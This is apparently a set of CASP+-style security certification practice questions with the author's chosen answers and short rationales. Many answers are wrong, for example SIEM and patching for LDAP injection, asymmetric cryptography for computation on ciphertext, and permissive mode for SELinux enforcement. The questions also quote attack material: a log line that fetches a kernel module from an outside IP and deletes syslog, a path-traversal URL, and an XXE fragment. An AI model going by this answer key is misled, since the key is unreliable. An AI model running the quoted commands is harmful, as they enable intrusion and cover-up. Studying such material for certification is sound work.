Site A: VPN Concentrator Directory Server Application Server PLC HVAC Pumps SCADA Controller Web Server
1 - VPN Concentrator
2 - Pumps
3 - Directory server
An organization is referencing NIST best practices for BCP creation while reviewing current internal organizational processes for mission-essential items.
Which of the following phases establishes the identification and prioritization of critical systems and functions?
A. Review a recent gap analysis.
B. Perform a cost-benefit analysis.
C. Conduct a business impact analysis.
D. Develop an exposure factor matrix.
C. Conduct a business impact analysis.
BCPs need BIAs.
An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization’s current methods for addressing risk may not be possible in the cloud environment.
Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud?
A. Migrating operations assumed the acceptance of all risk
B. Cloud providers are unable to avoid risk
C. Specific risks cannot be transferred to the cloud provider.
D. Risks to data in the cloud cannot be mitigated.
C. Specific risks cannot be transferred to the cloud provider.
Only answer that isn’t ridiculous…
A company created an external application for its customers. A security researcher now reports that the application has a serious LDAP injection vulnerability that could be leveraged to bypass authentication and authorization.
Which of the following actions would best resolve the issue (Choose two.)
A. Conduct input sanitization. B. Deploy a SIEM. C. Use containers. D. Patch the OS. E. Deploy a WAF. F. Deploy a reverse proxy. G. Deploy an IDS.
B and D.
B. Deploy a SIEM
D. Patch the OS
SPLUNK AND PATCH
In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure di not meet the company’s availability requirements. During a postmortem analysis, the following issues were highlighted.
1. International users reported latency when images on the web page were initially loading.
2. During times of report processing, users reported issues with inventory when attempting to place orders.
3. Despite the fact that ten new API servers were added the load across servers was heavy at peak times.
Which of the following infrastructure design changes would be BEST for the organization to implement to avoid these issues in the future?
A. Serve static ontent via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance.
B. Increase the bandwidth for the server that delivers images, use a CDN, change the database to a non-relational database, and split the ten API servers across two load balancers.
C. Serve images from the object storage bucket with infrequent read times, replicate the database across different regions, and dynamically create API servers based on load.
D. Server static-content object storage across different regions, increase the instance size on the managed relational database, and distribute the ten API servers across multiple regions.
A. Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance.
CDN, DB, Auto-Scale
During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room.
The company wants to be able to identify any unauthorized individuals who enter the storage room by following an authorized employee.
Which of the following processes would BEST satisfy this requirement?
A. Monitor camera footage corresponding to a valid access request.
B. Require both security and management to open the door.
C. Require department managers to review denied-access requests.
D. Issue new entry badges on a weekly basis.
A. Monitor camera footage corresponding to a valid access request.
A company is preparing to deploy a global service.
Which of the following must he company do to ensure DGPR compliance? (Choose two.)
A. Inform users regarding what data is stored.
B. Provide opt-in/out for marketing messages.
C. Provide data deletion capabilities.
D. Provide optional data encryption.
E. Grant data access to third parties.
F. Provide alternative authentication techniques.
A and B.
A. Inform users regarding what data is stored.
B. Provide opt-in/out for marketing messages.
General Data Protection Regulation, an EU regulation.
A SOC analyst is reviewing malicious activity on an external, exposed web server. During the investigation, the analyst determines specific traffic is not being logged, and there is no visibility from the WAF for the web application.
Which of the following is the MOST likely cause?
A. The user agent client is not compatible with the WAF.
B. A certificate on the WAF is expired.
C. HTTP traffic is not forwarding to HTTPS to decrypt.
D. Old, vulnerable cipher suites are still being used.
B. A certificate on the WAF is expired.
WAF Expired
A security analyst is validating the MAC policy on a set of Android devices. The policy was written to ensure non-critical applications are unable to access certain resources. When reviewing dmesg, the analyst notes many entries such as:
Despite the deny message, this action was still permitted.
Which of the following is the MOST likely fix for this issue?
A. Add the objects of concern to the default context.
B. Set the devices to enforcing.
C. Create separate domain and context files for irc.
D. Rebuild the policy, reinstall, and test.
B. Set the device to enforcing.
ENFORCING
A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been large log files generated by a website containing a “Contact Us” form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign or if this is a potential incident. Which of the following would BEST assist the analyst?
A. Ensuring proper input validation is configured on the “Contact Us” form
B. Deploy a WAF in front of the public website
C. Checking for new rules from inbound network IPS vendor
D. Running the website log files through a log reduction and analysis tool
D. Running the website log files through a log reduction and analysis tool.
The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified. Which of the following should the incident response team perform to understand the crash and prevent it in the future?
A. Root cause analysis
B. Continuity of operations plan
C. After-action report
D. Lessons learned
A. Root cause analysis
Understand the crash - Root cause analysis
A company is repeatedly being breached by hackers using valid credentials. The company’s Chief Information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendations would MOST likely reduce the risk of unauthorized access?
A. Implement strict three-factor authentication
B. Implement least privilege policies
C. Switch to one-time of all user authorizations
D. Strengthen identity-proofing procedures
A. Implement strict three-factor authentication.
If valid credentials are being used, an additional factor of authentication is required.
A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output, the best optin for auditor to use NEXT is:
:nmap -r-4 192.168.0.11
starting ap 7.40
Nmap scan report for 192.168.0.11
Most is up (0.102s latency)
Not shown: 59 filtered ports
PORT STATE SERVICE
80 / tcp open http
MAC Address: 04:18:18 ED: 10113 (CompTia)
Nmap done 1 IP address (1 host up) scanned in 3.18 seconds
A. A SCAP assessment
B. Reverse engineering
C. Fuzzing
D. Network interception
A. A SCAP assessment
Pretty much a port scan
An engineering team is developing and deploying a fleet of mobile devices to be used for specialized inventory management purposes. These devices should:
- Be based on open-source Android for user familiarity and ease.
- Provide a single application for inventory management of physical assets.
- Permit use of the camera by only the inventory application for the process of scanning.
- Disallow any and all configuration baseline modifications.
- Restrict all access to any device resource other than those required for use of the inventory management application.
Which of the following approaches would best meet these security requirements?
A. Set an application wrapping policy, wrap the application, distributes the inventory APK via the MAM tool, and test the application restrictions.
B. Write a MAC policy that defines domains with rules, label the inventory application, build the policy, and set to enforcing mode.
C. Swap out Android Linux kernel version for >2.4.0, but the internet build Android, remove unnecessary functions via MDL, configure to block network access, and perform integration testing.
D. Build and install an Android middleware policy with requirements added, copy the file into /user/init, and then build the inventory application.
A. Set an application wrapping policy, wrap the application, distributes, the inventory APK via the MAM tool, and test he application restrictions.
MAM - Mobile Application Management
Which of the following terms refers to the delivery of encryption keys to a CASB or a third-party entity?
A. Key sharing
B. Key distribution
C. Key recovery
D. Key escrow
B. Key distribution
Distribute those Ki’s
An organization is implementing a new identity and access management architecture with the following objectives:
- Supporting MFA against on-premises infrastructure
- Improving the user experience by integrating with SaaS applications
- Applying risk-based policies based on location
- Performing just-in-time provisioning
Which of the following authentication protocols should the organization implement to support these requirements?
A. Kerberos and TACACS
B. SAML and RADIUS
C. OAuth and OpenID
D. OTP and 802.1X
A. Kerberos and TACACS
mutifactor (TACACS) and SaaS integration (Kerberos)
Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?
A. Lattice-based cryptography
B. Quantum computing
C. Asymmetric cryptography
D. Homomorphic encryption
C. Asymmetric cryptography
ASYM
A company is looking to fortify its cybersecurity defenses and is focusing on its network infrastructure. The solution cannot affect the availability of the company’s services to ensure false positives do not drop legitimate traffic.
Which of the following would satisfy the requirement?
A. NIDS
B. NIPS
C. WAF
D. Reverse Proxy
B. NIPS
Network Intrusion Prevention System.
However, I think the answer is A. NIDS, because we cannot drop traffic. A NIPS will drop any traffic it flags.
A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services. Which of the following should be modified to prevent he issue from reoccurring?
A. Recovery point objective
B. Recovery time objective
C. Mission-essential functions
D. Recovery service level
B. Recovery time objective
I think the correct answer is D. Recovery Service Level
Recovery service level measure the percentage of compute required in DR.
A technician is reviewing the logs nd notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.
The technician will define this threat as:
A. A decrypting RSA using obsolete and weakened encryption attack.
B. A zero-day attack.
C. An advanced persistent threat.
D. An on-path attack.
A. A decrypting RDA using obsolete and weakened encryption attack.
Not HTTPS, so weak TLS.
A security engineer thinks the development team has been hard-coding sensitive environment variables in its code.
Which of the following would BEST secure the company’s CI/CD pipeline?
A. Utilizing a trusted secrets manager
B. Performing DAST on a weekly basis
C. Introducing the use of container orchestration
D. Deploying instance tagging
A. Utilizing a trusted secrets manager
A small company recently developed prototype technology for a military program. The company’s security engineer is concerned about potential theft of the newly developed, proprietary information.
Which of the following should the security engineer do to BEST manage the threats proactively?
A. Join an information-sharing community that is relevant to the company.
B. Leverage the MITRE ATT&CK framework to map the TTR.
C. Use OSINT techniques to evaluate and analyze the threats.
D. Update security awareness training to address new threats, such as best practices for data security.
D. Update security awareness training to address new threats, such as best practices for data security.
TRAINING
A developer implemented the following code snippet:
<a></a>
Which of the following vulnerabilities does the code snippet resolve?
A. SQL inject
B. Buffer overflow
C. Missing session limit
D. Information leakage</a>
D. Information leakage
A security analyst is investigating a series of suspicious emails by employees to the security team. The email appears to come from a current business partner and do not contain images or URLS, and only the following plain-text:
Test email sent from bp_app01 to external client_app01_mailing_list.
Which of the following should the security analyst perform?
A. Contact the security department at the business partner and alert them to the email event.
B. Block the IP address for the business partner at the perimeter firewall.
C. Pull the devices of the affected employees from the network in case they are infected with zero-day virus.
D. Configure the email gateway to automatically quarantine all messages originating from the business partner.
A. Contact the security department at the business partner and alert them to the email event.
A financial services company wants to migrate its email services from on-premises servers to a cloud-based email solution. The Chief Information Security Officer (CISO) must brief the board of directors on the potential security concerns related to this migration. The board is concerned about the following:
- Transactions being required by unauthorized individuals.
- Complete discretion regarding client names, account numbers, and investment information.
- Malicious attacker using email to distribute malware and ransomware.
- Exfiltration of sensitivity company information.
The cloud-based email solution will provide an6-malware, reputation-based scanning, signature-based scanning, and sandboxing. Which of the following is the BEST option to resolve the board’s concerns for this email migration?
A. Data loss prevention
B. Endpoint detection response
C. SSL VPN
D. Application whitelisting
A. Data loss prevention
DLP whenever exfiltration via email is involved
Which of the following BEST sets expectation between the security team and business units within an organization?
A. Risk assessment B. Memorandum of understanding C. Business impact analysis D. Business partnership agreement E. Services level agreement
C. Business impact analysis
BIA
A small company needs to reduce its operating costs, vendors have proposed solutions, which all focus on management of the company’s website and services. The Chief Information Security Officer (CISO) insist all available resources in the proposal must be dedicated but managing a private cloud is not an option. Which of the following is the BEST solution for this company?
A. Community cloud service model
B. Multinency SaaS
C. Single-tenency SaaS
D. On-premises cloud service model
A. Community cloud service model
Security is assisting the marketing department with ensuring the security of the organization’s social media platforms. The two main concerns are:
-The Chief marketing officer (CMO) email is being used department wide as the username.
-The password has been shared with the department.
Which of the following controls would be BEST for the analyst to recommend?
A. Configure MFA for all users to decrease their reliance on other authentication.
B. Have periodic, scheduled reviews to determine with OAuth configuration are set for each media platform.
C. Create multiple social media accounts for all marketing user to separate their actions.
D. Ensure the password being shared is not written down anywhere.
A. Configure MFA for all users to decrease their reliance on other authentication.
MULTIFACTOR
A security engineer at a company is designing a system to mitigate recent setbacks caused competitors that are beating the company to market with the new products. Several of the products incorporate propriety enhancements developed by the engineer’s company. The network already includes a SIEM and a NIPS and requires 2FA for all user access. Which of the following systems should the engineer consider NEXT to mitigate the associated risks?
A. DLP
B. Mail gateway
C. Data flow enforcements
D. UTM
A. DLP
Data loss prevention to mitigate lost proprietary data.
The Chief Information Officer (CIO) ask the system administrator to improve email security at the company based on the following requirements:
- Transaction being requested by unauthorized individuals.
- Complete discretion regarding client names, account numbers, and investment information.
- Malicious attackers using email to malware and ransomeware.
- Exfiltration of sensitive company information.
The cloud-based email solution will provide anti-malware reputation-based scanning, signature-based scanning, and sandboxing.
Which of the following is the BEST option to resolve the boar’s concerns for this email migration?
A. Data loss prevention
B. Endpoint detection response
C. SSL VPN
D. Application whitelisting
A. Data loss prevention
Exfiltration of data via email - DLP
A company intends all mobile devices to be encrypted, commensurate with full disk encryption scheme of assets, such as workstations, servers, and laptops. Which of the following will MOST likely be a limiting factor when selecting mobile device managers for the company?
A. Increased network latency
B. Unavailability of key escrow
C. Inability to select AES-256 encryption
D. Removal of user authentication requirements
A. Increased network latency
Only answer that makes sense.
A company is outsourcing to an MSSP that performs managed detection and response services. The MSSP requires a server to be placed inside the network as a log aggregate and allows remote access to MSSP analyst. Critical devices send logs to the log aggregator, where data is stored for 12 months locally before being archived to a multitenant cloud. The data is then sent from the log aggregate to a public IP address in the MSSP datacenter from analysis. A security engineer is concerned about the security of the solution and notes the following.
- The critical device sends cleartext logs to the aggregator.
- The log aggregator utilize full disk encryption.
- The log aggregator sends to the analysis server via port 80.
- MSSP analysis utilize an SSL VPN with MFA to access the log aggregator remotely.
- The data is compressed and encrypted prior to being achieved in the cloud.
Which of the following should be the engineer’s GREATEST concern?
A. Hardware vulnerabilities introduced by the log aggregate server.
B. Network bridging from a remote access VPN.
C. Encryption of data in transit.
D. Multinancy and data remnants in the cloud.
C. Encryption of data in transit.
Data is sent cleartext to a public IP address.
A business stores personal client data of individuals residing in the EU in order to process requests for mortgage loan approvals.
Which of the following does the business’s IT manager need to consider?
A. The availability of personal data
B. The right to personal data erasure
C. The company’s annual revenue
D. The language of the web application
B. The right to personal data erasure
EU takes personal data right and marketing opt-outs more seriously.
A company publishes several APIs for customers and is required to use keys to segregate customer data sets.
Which of the following would be BEST to use to store customer keys?
A. A trusted platform module
B. A hardware security module
C. A localized key store
D. A public key infrastructure
C. A localized key store
Key stores are for storing keys. Free points.
An organization wants to perform a scan of all its systems against best practice security configurations.
Which of the following SCAP standards, when combined, will enable the organization to view each of the configuration checks in a machine-readable checklist format for fill automation?
A. ARF B. XCCDF C. CPE D. CVE E. CVSS F. OVAL
B and F.
B. XCCDF
F. OVAL
Extensible Configuration Check Description Format
A company is migrating from company-owned phones to a BYOD strategy for mobile devices. The pilot program will start with the executive management team and be rolled out to the rest of the staff in phases. The company’s Chief Financial Officer loses a phone multiple times a year.
Which of the following will MOST likely secure the data on the lost device?
A. Require a VPN to be active to access company data.
B. Set up different profiles based on the person’s risk.
C. Remotely wipe the device.
D. Require MFA to access company applications.
D. Require MFA to access company applications.
A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.
Which of the following is the BEST solution?
A. Deploy an RA on each branch office.
B. Use Delta CRLs at the branches.
C. Configure clients to use OCSP.
D. Send the new CRLs by using GPO.
C. Configure clients to use OCSP.
Online Certificate Status Protocol
After a security incident, a network security engineer discovers that a portion of the company’s sensitive external traffic has been redirected through a secondary ISP that is not normally used.
Which of the following would BEST secure the routes while allowing the network to function in the even of a single provider failure?
A. Disable BGP and implement a single static route for each internal network.
B. Implement a BGP route reflector.
C. Implement an inbound BGP prefix list.
D. Disable BGP and Implement OSPF.
B. Implement a BGP route reflector.
A company’s SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign. Which of the following should the company use to make this determination?
A. Threat hunting
B. A system penetration test
C. Log analysis within the SIEM tool
D. The Cyber Kill Chain
B. A system penetration test
A security engineer needs to recommend a solution that will meet the following requirements:
- Identify sensitive data in the provider’s network
- Maintain compliance with company and regulatory guidelines
- Detect and respond to insider threats, privileged user threats, and compromised accounts
- Enforce datacentric security, such as encryption, tokenization, and access control
Which of the following solutions should the security engineer recommend to address these requirements?
A. WAF
B. CASB
C. SWG
D. DLP
A. WAF
Web application firewall
A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times. Which of the following should the engineer report as the ARO for successful breaches.
A. 0.5
B. 8
C. 50
D. 36,500
A. 0.5
ARO - Annualized Rate of Occurrence
A network architect is designing a new SD-WAN architecture to connect all local sites to a central hub site. The hub is then responsible for redirecting traffic to public cloud and datacenter applications. The SD-WAN routers are managed through a SaaS, and the same security policy is applied to staff whether working in the office or at a remote location. The main requirements are the following:
- The network supports core applications that have 99.99% uptime.
- Configuration updates to the SD-WAN routers can only be initiated from the management service.
- Documents downloaded from websites must be scanned for malware.
Which of the following solutions should the network architect implement to meet the requirements?
A. Reverse proxy, stateful firewalls, and VPNs at the local sites
B. IDSs, WAFs, and forward proxy IDS
C. DoS protection at the hub site, mutual certificate authentication, and cloud proxy
D. IPSs at the hub, Layer 4 firewalls, and DLP
B. IDSs, WAFs, and forward proxy IDS
FORWARD proxy
A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.
Which of the following is the BEST solution to meet these objectives?
A. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring.
B. Implement PAM, remove users from the local administrators group, and prompt users for explicit approval when elevated privileges are required.
C. Implement EDR, remove users from the local administrators group, and enable privilege escalation monitoring.
D. Implement EDR, keep users in the local administrators group, and enable user behavior analytics
A. Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring.
PAM
An organization’s hunt team thinks a persistent threats exists and already has a foothold in the enterprise network.
Which of the following techniques would be BEST for the hunt team to use to entice the adversary to uncover malicious activity?
A. Deploy a SOAR tool.
B. Modify user password history and length requirements.
C. Apply new isolation and segmentation schemes.
D. Implement decoy files on adjacent hosts.
C. Apply new isolation and segmentation schemes.
A security analyst is reviewing the following output:
Request URL: http://www.largeworldwidebank.org/../etc/password
Request method: GET
Which of the following would BEST mitigate this type of attack?
A. Installing a network firewall
B. Placing WAF inline
C. Implementing an IDS
D. Deploying a honeypott
A. Installing a network firewall
A security engineer has been asked to close all non-secure connections from the corporate network. The engineer is attempting to understand why the corporate UTM will not allow users to download email via IMAPS. The engineer formulates a theory and begins testing by creating the firewall ID 58, and users are able to download emails correctly by using IMAP instead. The network comprises three VLANs:
- VLAN 30 Guest networks 192.168.20.0/25
- VLAN 20 Corporate user network 192.168.0.0/28
- VLAN 110 Corporate server network 192.168.0.16/29
Which of the following should the security engineer do to ensure IMAPS functions properly on the corporate user network?
A. Contact the email service provider and ask if the company IP is blocked.
B. Confirm the email server certificate is installed on the corporate computers.
C. Make sure the UTM certificate is imported on the corporate computers.
D. Create an IMAPS firewall rule to ensure email is allowed.
C. Make sure the UTM certificate is imported on the corporate computers.
All the network stuff is a misdirection. UTM needs certs on the user network, VLAN 20.
A security analyst is reviewing network connectivity on a Linux workstation and examining the active TCP connections using the command line.
Which of the following commands would be the BEST to run to view only active internet connections?
A. sudo netstat -antu | grep “LisTEN” | awk ‘{print$5}’
B. sudo netstat -nit -p | grep “ESTABLISHED”
C. sudo netstat -pinfu | grep -v “Foreign Address”
D. sudo netstat -pnut -w | column -t -s $’\w’
E. sudo netstat -pnut | grep -P ^tcp
B. sudo netstat -nit -p | grep “ESTABLISHED”
Active internet connections - ESTABLISHED
A shipping company that is trying to eliminate entire classes of threats is developing an SELinux policy to ensure its custom Android devices are used exclusively for package tracking. After compiling and implementing the policy, in which of the following modes must the company ensure the devices are configured to run?
A. Protecting
B. Permissive
C. Enforcing
D. Mandatory
B. Permissive
Permit packages
A security analyst receives an alert from the SIEM regarding unusual activity on an authorized public SSH jump server. To further investigate, the analyst pulls the event logs directly from /var/log/auth.log: graphic.ssh_auth_log.
Which of the following actions would BEST address the potential risks by the activity in the logs?
A. Alerting the misconfigured service account password
B. Modifying the AllowUserts configuration directive
C. Restricting external port 22 access
D. Implementing host-key preferences
C. Restricting external port 22 access
SSH / Port 22
A high-severity vulnerability was found on a web application and introduced to the enterprise. The vulnerability could allow an unauthorized user to utilize an open-source library to view privileged user information. The enterprise is unwilling to accept the risk, but the developers cannot fix the issue right away.
Which of the following should be implemented to reduce the risk to an acceptable level until the issue can be fixed?
A. Scan the code with a static code analyzer, change privileged user passwords, and provide security training.
B. Change privileged usernames, review the OS logs, and deploy hardware tokens.
C. Implement MFA, review the application logs, and deploy a WAF.
D. Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.
D. Deploy a VPN, configure an official open-source library repository, and perform a full application review for vulnerabilities.
Open source library
A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
]>
&xxe;
Which of the following would BEST mitigate this vulnerability?
A. CAPTCHA
B. Input validation
C. Data encoding
D. Network intrusion prevention
B. Input validation
That square bracket would be caught with input validation
A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issues a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.
Which of the following should the security team recommend FIRST?
A. Investigating a potential threat identified in logs related ot the identity management system.
B. Updating the identity management system to use discretionary access control.
C. Beginning research on two-factor authentication to later introduce into the identity management system.
D. Working with procurement and creating a requirements document to select a new IAM system/vendor.
A. Investigating a potential threat identified in logs related to the identity management system.
A customer reports being unable to connect to a website at www.test.com to consume services.
The customer notices the web appliation has the following published cipher suite:
TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA385
Which of the following is the MOST likely cause of the customer’s inability to connect?
A. Weak ciphers are being used.
B. The public key should be using ECDSA.
C. The default should be on port 80.
D. The server name should be test.com
B. The public key should be using ECDSA
Eliptical Curve Digital Signature Algorithm instead of ECDHE (diffe helman)
An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access. Which of the following describes the administrator’s discovery?
A. A vulnerability
B. A threat
C. A breach
D. A risk
A. A vulnerability
A “missing crucial practice” on a server is an odd way of defining a vulnerability, but is accurate.
A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.
Which of the following should be the analyst’s FIRST action?
A. Create a full inventory of information and data assets.
B. Ascertain the impact of an attack on the availability of crucial resources.
C. Determine which security compliance standards should be followed.
D. Perform a full system penetration test to determine the vulnerabilities.
C. Determine which security compliance standards should be followed.
DETERMINE first
While investigating a security event, an analyst finds evidence that a user opened an email attachment from an unknown source. Shortly after the user opened the attachment, a group of servers experienced a large amount of network and resource activity. Upon investigating the servers, the analyst discovers the servers were encrypted by ransomware that is demanding payment within 48 ours or all data will be destroyed. The company has no response plans for the ransomware.
Which of the following is the NEXT step the analyst should take after reporting the incident to the management team?
A. Pay the ransom within 48 hours.
B. Isolate the servers to prevent he spread.
C. Notify law enforcement.
D. Request that he affected servers be restored immediately.
C. Notify law enforcement
A security consultant is attempting to discover if the company is utilizing databases on client machines to store the customer data. The consultant reviews the following information:
- TCP A to B: port 25 connection established
- TCP A to C: port 443 connection established
- UDP A to D: port 53 waiting/listening
- TCP E to F: port 1433 connection established
Which of the following commands would have provided this output?
A. arp -s
B. netstat -a
C. ifconfig -arp
D. sqlmap -w
B. netstat -a
A security administrator wants to allow external organizations to cryptographically validate the company’s domain name in email messages sent by employees. Which of the following should the security administrator implement?
A. SPF
B. S/MIME
C. TLS
D. DKIM
D. DKIM
Domain-Keys Identified Email
A large enterprise with thousands of users is experiencing a relatively high frequency of malicious activity from the insider threats. Much of the activity appears to involve internal reconnaissance that results in targeted attacks against privileged users and network file shares. Given this scenario, which of the following would MOST likely prevent or deter these attacks? (Choose two.)
A. Conduct role-based training for privileged users that highlights common threats against them and covers the best practices to thwart attacks.
B. Increase the frequency at which host operating systems are scanned for vulnerabilities, and decrease the amount of time permitted between vulnerability identification and the application of corresponding attacks.
C. Enforce command shell restrictions via group policies for all workstations by default to limit which native operating system tools are available for use.
D. Modify the existing rules of behavior to include an explicit statement prohibiting users from enumerating user and file directories using available tools and/or accessing visible resources that do not directly pertain to their job functions.
E. For all workstations, implement full-disk encryption and configure UEFI instances to require complex passwords for authentication.
F. Implement application blacklisting enforced by the operating systems of all machines in the enterprise.
C and D.
C. Enforce command shell restrictions via group policies for all workstations by default to limit which native operating system tools are available for use.
D. Modify the existing rules of behavior to include an explicit statement prohibiting users from enumerating user and file directories using available tools and/or accessing visible resources that do not directly pertain to their job functions.
ENFORCE and MODIFY
A team is at the beginning stages of designing a new enterprise-wide application. The new application will have a large database and require a capital investment in hardware. The Chief Information Officer (CIO) has directed the team to save money and reduce the reliance on the datacenter, and the vendor must specialize in hosting large databases in the cloud.
Which of the following cloud-hosting options would BEST meet these needs?
A. Multi-tenancy SaaS
B. Hybrid IaaS
C. Single-tenancy PaaS
D. Community IaaS
C. Single-tenancy PaaS
Platform as a Service
Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks.
Which of the following would have allowed the security team to use historical information to protect against the second attack?
A. Key risk indicators
B. Lessons learned
C. Recovery point objectives
D. Tabletop exercise
B. Lessons learned
A security engineer has implemented an internal user access review tool so service teams can baseline user accounts and group memberships. The tool is functional and popular among its initial set of onboarded teams. However, the tool has not been built to cater to a broader set of internal teams yet. The engineer has sought feedback from internal stakeholders, and a list of summarized requirements is as follows:
- The tool needs to be responsive so service teams can query it, and then perform an automated response action.
- The tool needs to be resilient to outages so service teams can perform the user access review at any point in time and meet their own SLAs.
- The tool will become the system-of-record for approval, reapproval, and removal life cycles of group memberships and must allow for data retrieval after failure.
Which of the following need specific attention to meet the requirements listed above? (Choose three.)
A. Scalability B. Latency C. Availability D. Usability E. Recoverability F. Maintainability
B, C, and E.
B. Latency
C. Availability
E. Recoverability
Responsive / SLA - Latency
Responsive / Query - Availability
Resilient / Post-failure retrieval - Recoverability
After investigating virus outbreaks that have cost he company $1,000 per incident, the company’s Chief Information Security Officer (CISO) has been researching new antivirus software solutions to use and be fully supported for the next two years. The CISO has narrowed down the potential solutions to four candidates that meet all the company’s performance and capability requirements:
Product A - 10 + 3 + 1 + 1. Product B - 14 + 1 + 1. Product C - 9 + 2 + 2 + 1 Product D - 7 + 1 + 2 + 2 Product E - 7 + 4 + 4
D. Product D
At 12, it is the smallest cost.
A newly hired systems administrator is trying to connect a new and fully updated, but very customized, Android device to access corporate resources. However, the MDM enrollment process continually fails. The administrator asks a security team member to look into the issue.
Which of the following is MOST likely reason reason the MDM is not allowing enrollment?
A. The OS version is not compatible
B. The OEM is prohibited
C. The device does not support FDE
D. The device is rooted
D. The device is rooted
Very customized - probably rooted
A security administrator was informed that a server unexpectedly rebooted. The administrator received an export of syslog entries for analysis:
user jsmith: exec ‘ls -l /data/finance/payroll/*.xls
Access denied
user jsmith: exec ‘wget 5.5.5.5/modinject.o -0 /tmp/downloads/modinject.o’
user root: exec ‘rm-rf /var/log/sysLog’
kernel: PANIC ‘unable to handle paging request at 0x45A800C’
Which of the following does the log sample indicate? (Choose two.)
A. A root user performed an injection attack via kernel module.
B. Encrypted payroll data was successfully decrypted by the attacker.
C. Jsmith successfully used a privilege escalation attack.
D. Payroll data was exfiltrated to an attacker-controlled host.
E. Buffer overflow in memory paging caused a kernel panic.
F. Syslog entries were lost due to the host being rebooted.
C and E.
C. Jsmith successfully used a privilege escalation attack.
E. Buffer overflow in memory paging caused a kernel panic.
The risk subcommittee of a corporate board typically maintains a master register of the most prominent risks to the company. A centralized holistic view of risk is particularly important to the corporate Chief Information Security Officer (CISO) because:
A. IT systems are maintained in silos to minimize interconnected risks and provide clear risk boundaries used to implement compensating controls.
B. Risks introduced by a system in one business unit can affect other business units in ways in which the individual business units have no awareness.
C. Corporate general counsel requires a single systems boundary to determine overall corporate risk exposure.
D. Major risks identified by the subcommittee merit the prioritized allocation of scare funding to address cybersecurity concerns.
B. Risks introduced by a system in one business unit can affect other business units in ways in which the individual business units have no awareness.
A hospital’s security team recently determined its network was breached and patient data was accessed by an external entity. The Chief Information Security Officer (CISO) of the hospital approaches the executive management team with this information, reports the vulnerability that led to the breach has already been remediated, and explains the team is continuing to follow the appropriate incident response plan. The executive team is concerned about the hospital’s brand reputation and asks the CISO when the incident should be disclosed to the affected patients.
Which of the following is the MOST appropriate response?
A. When it is mandated by their legal and regulatory requirements.
B. As soon as possible in the interest of the patients.
C. As soon as the public relations department is ready to be interviewed.
D. When all steps related to the incident response plan are completed.
E. Upon the approval of the Chief Executive Officer (CEO) to release information to the public.
A. When it is mandated by their legal and regulatory requirements.
A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public internet:
C:\nslookup -querytype=MX comptia.org
Server: Unknown
Address: 198.51.100.45
comptia.org MX preference=10, mail exchanger = 192.168.`102.33
comptia.org MX preference=20, mail exchanger = exchg1.comptia.org
exchg1.comptia.org
Internet Address = 192.168.102.67
Which of the following should the penetration tester conclude about he command output?
A. The public/private views on the Comptia.org DNS servers are misconfigured.
B. Comptia.org is running an older mail server, which may be vulnerable to exploits.
C. The DNS SPF records have not been updated for Comptia.org.
D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.
A. The public/private network views on the Comptia.org DNS servers are misconfigured.
Shows a 192.168.x.x address as public
An organization has employed the services of an auditing firm to perform a gap assessment in preparation for an upcoming audit. As part of the gap assessment, the auditor supporting the assessment recommends the organization engage with the other industry partners to share information about emerging attacks to organizations in the industry in which the organization functions.
Which of the following types of information could be drawn from such participation?
A. Threat modeling B. Risk assessment C. Vulnerability data D. Threat intelligence E. Risk metrics F. Exploit frameworks
F. Exploit frameworks
Competitors are unlikely to share other information
A business is growing and starting to branch out into other locations, in anticipation of opening an office in a different country, the Chief Information Security Officer (CISO) and legal team agree they need to meet the following criteria regarding data to open the new office:
- Store taxation-related documents for five years
- Store customer addresses in an encrypted format
- Destroy customer information after one year
- Keep data only in the customer’s home country
Which of the following should the CISO implement to BEST meet these requirements? (Choose three.)
A. Capacity planning policy B. Data retention policy C. Data classification standard D. Legal compliance policy E. Data sovereignty policy F. Backup policy G. Acceptable use policy H. Encryption standard
